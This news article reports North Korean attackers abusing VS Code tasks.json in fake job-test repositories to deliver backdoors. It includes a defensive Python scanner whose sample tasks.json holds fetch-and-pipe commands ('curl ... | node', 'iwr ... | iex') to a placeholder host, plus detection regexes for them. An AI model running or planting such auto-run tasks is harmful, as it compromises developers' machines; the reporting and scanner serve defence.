
North Korean threat actors associated with the long-running Contagious Interview campaign have been observed using malicious Microsoft Visual Studio Code (VS Code) projects as decoys that deliver backdoors onto compromised endpoints.
According to Jamf Threat Labs, the latest findings demonstrate the continued evolution of new tactics first discovered in December 2025.
“This activity included the deployment of a backdoor implant that provided remote code execution capabilities on victims’ systems,” security researcher Thijs Xhaflaire said in a report shared with The Hacker News.
The attack, first revealed last month by OpenSourceMalware, essentially involves instructing potential targets to clone a repository on GitHub, GitLab, or Bitbucket and launch a project in VS Code as part of a supposed job evaluation.
The ultimate goal of these efforts is to abuse VS Code task configuration files (tasks.json) to execute malicious payloads staged on Vercel domains, with the payload selected according to the operating system of the infected host. The task is configured to run every time the project folder is opened in VS Code by setting the "runOn": "folderOpen" option. This ultimately leads to the deployment of BeaverTail and InvisibleFerret.
Subsequent iterations of the campaign revealed that the attackers had hidden a sophisticated multi-stage dropper inside the task configuration file, disguised as a benign spell-checking dictionary. It serves as a fallback mechanism in case the task is unable to retrieve the payload from the Vercel domain.

As before, the obfuscated JavaScript embedded in these files is executed as soon as the victim opens the project in an integrated development environment (IDE). It establishes communication with the remote server ("ip-regions-check.vercel[.]app") and executes the JavaScript code received from it. The final stage delivered as part of the attack is another heavily obfuscated JavaScript payload.
Jamf said it discovered yet another change in this campaign. The attackers used a previously undocumented infection method to distribute a backdoor that provided remote code execution capabilities on compromised hosts. The starting point of the attack chain remains the same in that it is activated when a victim uses VS Code to clone and open a malicious Git repository.
“When you open a project, Visual Studio Code asks you to trust the repository creator,” Xhaflaire explained. “Once that trust is granted, the application automatically processes the repository’s tasks.json configuration file, which could result in arbitrary embedded commands being executed on the system.”
“On macOS systems, this runs a background shell command that uses nohup bash -c in conjunction with curl -s to remotely retrieve the JavaScript payload and pipe it directly to the Node.js runtime. This allows execution to continue independently, suppressing all command output, even when the Visual Studio Code process terminates.”
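The two mechanisms described above, a tasks.json entry that fires on folder open and a shell command that fetches a remote script and pipes it into an interpreter, are straightforward to look for in a repository before trusting it. The following is an added example of a defensive scanner written for this article; it is not code from Jamf, OpenSourceMalware or any of the reports cited here. It parses VS Code's tasks.json (which, unlike plain JSON, permits comments and trailing commas), then flags tasks that auto-run on folder open and whose command, whether the default one or a per-OS override, combines a network fetch with a pipe into node, bash, PowerShell's iex and similar. The embedded tasks.json is constructed for illustration and its URL is a placeholder, not an indicator from the report.

```python
"""Scan a VS Code tasks.json for auto-run tasks that fetch and execute remote code.

Added example, not code from the reports discussed in the article. The sample
tasks.json below is constructed; the domain in it is a placeholder.
"""
import json
import re
from typing import Any, Iterator

# Constructed sample shaped like the abuse described in the article. VS Code
# reads tasks.json as JSONC, so comments and trailing commas are legal here.
SAMPLE_TASKS_JSON = r'''
{
  // "folderOpen" makes VS Code run the task as soon as a trusted folder opens
  "version": "2.0.0",
  "tasks": [
    {
      "label": "Setup dev environment",
      "type": "shell",
      "command": "nohup bash -c 'curl -s https://example-placeholder.invalid/p.js | node' >/dev/null 2>&1 &",
      "windows": { "command": "powershell -c \"iwr https://example-placeholder.invalid/p.js | iex\"" },
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" },
    },
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
    },
  ],
}
'''

# Heuristics for the fetch-and-pipe pattern. They are deliberately broad; a
# match means "a human should read this task", not a definitive verdict.
FETCH_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b", re.I)
INTERP_RE = re.compile(r"\|\s*(node|bash|sh|zsh|python3?|iex|Invoke-Expression)\b", re.I)
DETACH_RE = re.compile(r"\bnohup\b|&\s*$|\bStart-Process\b", re.I)
_TRAILING_COMMA_RE = re.compile(r",(\s*[}\]])")


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments outside string literals, then trailing commas.

    A character-level scan is used rather than a bare regex so that "https://..."
    inside a command string is not mistaken for a comment.
    """
    out: list[str] = []
    i, n, in_str = 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped char verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j          # newline itself is kept
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    # Trailing-comma removal is regex based and could touch a ",}" inside a
    # string literal; acceptable for a triage tool, noted here as a limitation.
    return _TRAILING_COMMA_RE.sub(r"\1", "".join(out))


def task_commands(task: dict[str, Any]) -> Iterator[tuple[str, str]]:
    """Yield (platform, command) for the default command and per-OS overrides."""
    if isinstance(task.get("command"), str):
        yield "default", task["command"]
    for os_key in ("linux", "osx", "windows"):
        sub = task.get(os_key)
        if isinstance(sub, dict) and isinstance(sub.get("command"), str):
            yield os_key, sub["command"]


def assess_task(task: dict[str, Any]) -> dict[str, Any]:
    """Classify one task as 'ok', 'review' or 'suspicious' with the reasons."""
    run_opts = task.get("runOptions")
    auto_run = isinstance(run_opts, dict) and run_opts.get("runOn") == "folderOpen"
    pres = task.get("presentation")
    hidden = isinstance(pres, dict) and pres.get("reveal") == "never"
    findings = []
    for platform, cmd in task_commands(task):
        reasons = []
        if FETCH_RE.search(cmd):
            reasons.append("remote fetch")
        if INTERP_RE.search(cmd):
            reasons.append("piped into interpreter")
        if DETACH_RE.search(cmd):
            reasons.append("detached from VS Code process")
        if reasons:
            findings.append({"platform": platform, "command": cmd, "reasons": reasons})
    if auto_run and findings:
        verdict = "suspicious"       # runs on open AND fetches/executes remote code
    elif auto_run or findings:
        verdict = "review"           # one of the two traits alone still merits a look
    else:
        verdict = "ok"
    return {"label": task.get("label", "<unnamed>"), "auto_run": auto_run,
            "hidden": hidden, "findings": findings, "verdict": verdict}


def scan_tasks_json(text: str) -> list[dict[str, Any]]:
    """Parse a tasks.json body and assess every task in it."""
    data = json.loads(strip_jsonc(text))
    return [assess_task(t) for t in data.get("tasks", []) if isinstance(t, dict)]


if __name__ == "__main__":
    for result in scan_tasks_json(SAMPLE_TASKS_JSON):
        print(f"[{result['verdict']}] {result['label']} auto_run={result['auto_run']} hidden={result['hidden']}")
        for f in result["findings"]:
            print(f"    {f['platform']}: {', '.join(f['reasons'])}")
```

Run against a real checkout with `scan_tasks_json(open('.vscode/tasks.json').read())`. Because VS Code only runs these tasks after the user grants trust to the folder, the practical place for such a check is before that prompt is answered, for example as a pre-clone review step or a policy that keeps Workspace Trust enabled and does not grant it to repositories received through recruiting conversations.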
The Vercel-hosted JavaScript payload contains the main backdoor logic to gather basic host information and communicate with the remote server to establish a persistent execution loop that facilitates remote code execution, system fingerprinting, and ongoing communication.
In one case, the Apple device management company said it observed more JavaScript instructions being executed about eight minutes after the initial infection. The newly downloaded JavaScript is designed to send a beacon to the server every 5 seconds, execute additional JavaScript, and erase traces of activity upon receiving a signal from the operator. It is suspected that the script may have been generated using artificial intelligence (AI) tools due to the presence of inline comments and phrases in the source code.
Threat actors associated with the Democratic People’s Republic of Korea (DPRK) are known to specifically target software engineers, particularly those working in the cryptocurrency, blockchain, and fintech fields. This is because software engineers often have privileged access to financial assets, digital wallets, and technological infrastructure.
Compromising an account or system can allow an attacker to gain unauthorized access to source code, intellectual property, and internal systems, and to siphon off digital assets. These continual changes in tactics are seen as an effort to achieve greater success in cyber espionage and financial theft in support of the heavily sanctioned regime.
The development comes as Red Asgard details an investigation into a malicious repository called Tsunami (also known as TsunamiKit) that was found to be using VS Code task configurations to obtain obfuscated JavaScript designed to drop a full-featured backdoor and XMRig cryptocurrency miner.

Separate analysis released last week by the Security Alliance revealed the campaign's abuse of VS Code tasks in attacks that approached unspecified victims on LinkedIn. The attacker claimed to be the chief technology officer of a project called Meta2140 and shared a concept[.]so link containing a technical assessment and a URL to the Bitbucket repository hosting the malicious code.
Interestingly, this attack chain is designed to fall back to two other methods: it installs a malicious npm dependency named "grayavatar", or it runs JavaScript code that fetches an advanced Node.js controller. This controller runs five different modules to record keystrokes, take screenshots, scan the system's home directory for sensitive files, replace wallet addresses copied to the clipboard, harvest credentials from web browsers, and establish a persistent connection to a remote server.
The malware then sets up a parallel Python environment with a stager script that enables data collection, cryptocurrency mining using XMRig, keylogging, and deployment of AnyDesk for remote access. Note that the Node.js and Python layers are known as BeaverTail and InvisibleFerret, respectively.
These findings indicate that state-sponsored attackers are experimenting with multiple delivery methods in parallel to increase the likelihood of a successful attack.
“This activity highlights the continued evolution of threat actors associated with North Korea, who are consistently adapting their tools and delivery mechanisms to integrate with legitimate developer workflows,” Jamf said. “The exploitation of Visual Studio Code task configuration files and Node.js execution shows that these technologies continue to evolve along with commonly used development tools.”
